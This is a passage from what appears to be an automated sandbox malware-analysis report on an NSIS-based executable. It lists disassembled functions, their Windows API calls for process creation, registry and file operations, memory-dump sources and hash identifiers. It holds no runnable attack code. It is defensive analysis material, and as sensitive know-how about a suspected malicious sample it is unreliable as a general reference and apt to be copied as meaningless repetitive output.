                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3356406503-1824292864
                                                          • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                          • Instruction ID: ccae29ee16f81b62eed190a0e72f85d1395cd89474178e8bc9e2f9375c5b4726
                                                          • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                          • Instruction Fuzzy Hash: C7017172510209EADF21CF55CD05EDF3BA8EB54360F018035FD1596191D779D968CBA4
                                                          Function 00405867 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                          • CloseHandle.KERNEL32(?), ref: 0040589D
                                                          Strings
                                                          • Error launching installer, xrefs: 0040587A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                          • Instruction ID: d54ab7d3c02f92ec190dfac26e1bcd6e14271da7ed0e34d6283108f8b7c5a0e7
                                                          • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                          • Instruction Fuzzy Hash: D4E09AB5900209BFEB109F65DD49F7B77ACEB04744F004565BD50F2150D778D8148A78
                                                          Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000), ref: 1000295B
                                                          • GetLastError.KERNEL32 ref: 10002A62
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastPointer
                                                          • String ID:
                                                          • API String ID: 2976181284-0
                                                          • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                          • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                          • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                          • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                          Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024AF
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqA869.tmp,00000000,00000011,00000002), ref: 00402551
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          • Opcode ID: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                          • Instruction ID: 5dbb434a41a715d7517c89e318d331cd35bfdf9d93bbd69694c25902619df99f
                                                          • Opcode Fuzzy Hash: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                          • Instruction Fuzzy Hash: DC11A331910209EFEF24DFA4CA585BEB6B4EF04354F21843FE046A72C0D7B84A45DB59
                                                          Function 00405C5B Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                            • Part of subcall function 00405BFE: CharNextW.USER32(?,?,0042FA50,?,00405C72,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C0C
                                                            • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                            • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                          • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405CB4
                                                          • GetFileAttributesW.KERNELBASE(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00405CC4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID:
                                                          • API String ID: 3248276644-0
                                                          • Opcode ID: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                          • Instruction ID: 85ea7651a51856ee7c4c0712bbf35357d52fdd33bb29f336d43f3a771a20a055
                                                          • Opcode Fuzzy Hash: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                          • Instruction Fuzzy Hash: 0DF0F925109F5215F622323A1D09EAF2554CF83368716463FF952B16D5DA3C99038D7D
                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                          • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                          • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                          • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                          Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteValue
                                                          • String ID:
                                                          • API String ID: 2831762973-0
                                                          • Opcode ID: 521e33bf1c8ff9c3df6ac7757e7f8edd3bb41d92ca0b3b7281954678aee4cd22
                                                          • Instruction ID: a65daa511511277569afb244ca8fe97b80a25767db049908362439423f8cf232
                                                          • Opcode Fuzzy Hash: 521e33bf1c8ff9c3df6ac7757e7f8edd3bb41d92ca0b3b7281954678aee4cd22
                                                          • Instruction Fuzzy Hash: E5F09632A041149BE711BBA49B4EABEB2A99B44354F16043FFA02F71C1DEFC4D41966D
                                                          Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          • Opcode ID: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                          • Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
                                                          • Opcode Fuzzy Hash: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                          • Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59
                                                          Function 0040665C Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                            • Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                            • Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
                                                            • Part of subcall function 004065EC: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                          • Instruction ID: f71ddd0ba98f8a8be4c3f380e987b43417b0e7e7cad23f5b62dfe7414387192f
                                                          • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                          • Instruction Fuzzy Hash: 18E026321002016AC7008A305E4083763AC9B85340303883FFD46F2081DB39DC31A6AD
                                                          Function 00405D74 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                          • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                          • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                          • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                          Function 00405832 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
                                                          • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                          • Instruction ID: 034de6f099216337e7681325378c15a49c0ca39433587e883605b7c80b1fabea
                                                          • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                          • Instruction Fuzzy Hash: C8C08C312155019AC7002F219F08B0B3A50AB20340F018439A946E00E0DA308424DD2D
                                                          Function 004027E9 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                            • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          • Opcode ID: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                          • Instruction ID: 338d2460217d73ea2e2bb91e7847e27d4a9cf2f97daf1e2edf82c438741940a9
                                                          • Opcode Fuzzy Hash: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                          • Instruction Fuzzy Hash: 83E09271B00104AFDB11EBA5AE498AE7779DB80314B24403BF101F50D2CA794E119E2D
                                                          Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                          • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                          • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                          • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                          Function 0040611D Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                          • Instruction ID: 190238b8cd19dd4efab6c9cc8903e135eae53195524c7f3a74b1c4143961a507
                                                          • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                          • Instruction Fuzzy Hash: A1E0E6B2010109BEDF095F50DD0AD7B371DEB04704F01452EFA57D5091E6B5A9309679
                                                          Function 00405E26 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
